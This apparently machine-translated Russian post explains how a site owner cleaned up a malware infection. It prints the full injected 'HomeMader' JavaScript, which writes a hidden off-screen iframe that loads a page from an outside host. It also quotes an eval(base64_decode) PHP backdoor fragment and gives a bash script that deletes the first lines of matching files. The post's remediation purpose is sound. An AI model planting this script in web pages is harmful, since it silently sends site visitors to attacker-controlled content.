ИСПРАВЛЕНИЕ: Удалите fsf.org HomeMader / ActerMoto / lusikrators вредоносное ПО JavaScript

Два дня назад я получил этот скрипт поверх всех моих файлов javascript на моих сайтах:

/*
Copyright (C) 2007 Free Software Foundation, Inc. fsf.org
*/
function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://milkatures.getonnow.net/briopo;osiue16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date).getTime()+64*60*60*1e3);document.cookie="lastshow=1; path=/; expires="+r.toUTCString()}}HomeMader()
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt
*/

После некоторых исследований я получил следующие советы по удалению вредоносного ПО javascript / php с вашего сайта.

1. Сначала найдите во всех ваших файлах «eval (base64_decode (»), вы найдете файл с именем xm.php (размер: 43 КБ). Возможно, у него есть другое имя на вашем сервере, но он содержит очень локальный код base64 в функции eval ( удалите файл с этим кодом, для получения дополнительной информации о файле см .: http://aw-snap.info/articles/backdoor-examples.php):

Eval (base64_decode ( «Ly80ZDFlZWUyNDNjNTE4ZjFjN2FjNjE4MzdmMDQ3ZjlkYmFhZWE …

2. Запустите этот скрипт, чтобы удалить все коды javascript из ваших файлов (более подробную информацию о скрипте смотрите: http://blog.lux-medien.com/2014/09/how-to-fix-actermoto-and-its-edited-javascript-files/ )

(в этом случае замените REPLACE_WITH_A_UNIQUE_NAME_FROM_THE_COOKIE_SCRIPT, например, HomeMader)

#!/bin/bash
# This script will fix (or try to fix) infected stuff on your server.
# by Andreas Zeller of lux-medien.com - 15.09.2014

NUMBER_OF_LINES=4 ## This is the number of lines that are infected at the top of the file. Notice that this ONLY works if there is a number of lines to be removed on top of the file. Otherwise this script will break stuff.
IDENTIFYING_STRING="REPLACE_WITH_A_UNIQUE_NAME_FROM_THE_COOKIE_SCRIPT" ## This is the string that will identify the infected file. Most scripts add some sort of website or some other UNIQUE string to it. Adjust to your needs.

echo "Trying to fix your shit. Use at your own risk."malicious_list=`grep --include=\*.js -rnl . -e "$IDENTIFYING_STRING"`
if [ -z "$malicious_list" ]
then
echo "Nothing found. You seem to be clean."else
echo "Found `echo "$malicious_list" | wc -l` malicious files..."fi

for filename in $malicious_list
do
echo "Fixing $filename"if [ -f $filename ]
then
sed -i -e 1,"$NUMBER_OF_LINES"d $filename
else
echo "File $filename not found"fi
done
exit

Я не знаю, как добавить файл xm.php на сервер. Но я надеюсь, что это поможет другим людям решить эту проблему. Если вы знаете больше об этом, как его добавить на сервер? Пожалуйста, дайте мне знать!